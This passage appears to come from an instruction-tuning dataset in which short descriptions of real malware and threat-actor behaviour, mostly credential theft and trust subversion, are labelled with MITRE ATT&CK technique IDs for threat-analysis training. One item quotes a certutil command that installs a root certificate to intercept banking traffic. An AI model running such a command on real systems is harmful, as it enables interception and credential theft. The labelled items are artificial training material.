\"\"~/.config/autostart/dbus-inotifier.desktop\"\" to establish persistence.\"", + "output": "- T1547.013: Boot or Logon Autostart Execution - XDG Autostart Entries" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Dok uses AppleScript to install a login Item by sending Apple events to the \"\"System Events\"\" process.\"", + "output": "- T1547.015: Boot or Logon Autostart Execution - Login Items" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).", + "output": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cobalt Strike can use \"\"sudo\"\" to run a command.\"", + "output": "- T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OSX/Shlayer can escalate privileges to root by asking the user for credentials.", + "output": "- T1548.004: Abuse Elevation Control Mechanism - Elevated Execution with Prompt" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FoggyWeb can allow abuse of a compromised AD FS server's SAML token.", + "output": "- T1550: Use Alternate Authentication Material" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.", + "output": "- T1550.001: Use Alternate Authentication Material - Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has dumped password hashes for use in pass the hash authentication attacks.", + "output": "- T1550.002: Use Alternate Authentication Material - Pass the Hash" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HOPLIGHT has been observed loading several APIs associated with Pass the Hash.", + "output": "- T1550.002: Use Alternate Authentication Material - Pass the Hash" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.", + "output": "- T1550.003: Use Alternate Authentication Material - Pass the Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Mimikatz\u2019s \"\"LSADUMP::DCSync\"\" and \"\"KERBEROS::PTT\"\" modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.\"", + "output": "- T1550.003: Use Alternate Authentication Material - Pass the Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth uses an external software known as NetPass to recover passwords.", + "output": "- T1552: Unsecured Credentials\n- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LaZagne can obtain credentials from chats, databases, mail, and WiFi.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QuasarRAT can obtain passwords from FTP clients.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stolen Pencil has used tools that are capable of obtaining credentials from saved mail.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \"\".vnc.lnk\"\" affix to steal VNC credentials.\"", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XTunnel is capable of accessing locally stored passwords on victims.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ebury has intercepted unencrypted private keys as well as private key pass-phrases.", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Mimikatz's \"\"CRYPTO::Extract\"\" module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.\"", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.", + "output": "- T1552.006: Unsecured Credentials - Group Policy Preferences" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.", + "output": "- T1552.006: Unsecured Credentials - Group Policy Preferences" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Axiom has used digital certificates to deliver malware.", + "output": "- T1553: Subvert Trust Controls" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them.", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RTM can add a certificate to the Windows store.", + "output": "- T1553.004: Subvert Trust Controls - Install Root Certificate" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: \"\"certutil -addstore -f -user ROOT ProgramData\\cert512121.der\"\".\"", + "output": "- T1553.004: Subvert Trust Controls - Install Root Certificate" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.", + "output": "- T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ThiefQuest searches through the \"\"/Users/\"\" folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.\"", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A module in Prikormka collects passwords stored in applications installed on the victim.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KGH_SPY can collect credentials from WINSCP.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Matryoshka is capable of stealing Outlook passwords.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NETWIRE can retrieve passwords from messaging and mail client applications.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OLDBAIT collects credentials from several email clients.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLEAD has the ability to steal saved passwords from Microsoft Outlook.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 can decrypt passwords stored in the RDCMan configuration file.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RedLeaves can gather browser usernames and passwords.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK 